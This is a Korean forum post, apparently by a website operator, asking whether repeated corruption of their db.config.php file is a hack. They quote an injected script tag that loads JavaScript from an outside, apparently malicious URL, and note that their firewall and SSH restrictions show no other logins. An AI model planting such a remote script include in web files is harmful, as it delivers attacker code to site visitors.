안녕하세요.

몇일 전부터 제가 운영하는 사이트가 한번씩 접속이 안되는 일이 있었습니다.

로그를 보니까 db.config.php 부분에 문제가 있다고 나와서 확인하니 파일 내용이 깨져 있었습니다.

그래서 백업해둔 파일로 대체해서 올리는 형식으로 해결했습니다.

하지만어째서 한번씩 파일이 깨지는건지에 대한 이유는 전혀 모르는 상태였습니다.

문제는 오늘도 그런 상황이 생겨서 바로 db.config.php를 교체하려고 했는데

이번에는 기본 내용의 마지막줄에 특정 스크립트를 불러오는 코드가 포함되어 있는것을 확인했습니다.

  'sitelock_message' => 'Maintenance in progress...'
);
<script src="http://shoestring.co.kr/xxe/dd/12.js"></script>

이런식으로 코드가 db.config.php에 포함되어 있었습니다.

저런식으로 수정되면 당연히 사이트 접속이 안되니까 바로 발견했습니다.

저 주소로 들어가보니 어베스트 백신이 막는것으로 봐서는 해킹과 관련이 있을거라고 생각됩니다..

다만 원인을 모르겠는 부분은 전 22번 포트를 방화벽으로 막아놨고 로그를 확인해보니 root 계정을 포함해서 저 이외에 로그인한 기록이 없습니다.

방화벽도 설정이 되어있고 sshd에서도 제 IP만을 허용해둔 상태입니다. 아마 기본적인 보안설정은 해둔거라고 생각합니다.

만약 가능성이 있다면 방화벽 차단을 넘어서 접속을 했다는 부분이 되는데...

db.config.php를 수정한걸 보면 sftp혹은 ssh으로 접속한거라고 생각합니다.

이거 해킹시도라고 볼 수 있는 부분인가요?

근데 방화벽을 넘어서 오는 해킹이라니 도저히 막을 방법이 생각나지 않네요..

일단 패스워드는 전부 더 복잡해서 변경은 해놨는데 걱정입니다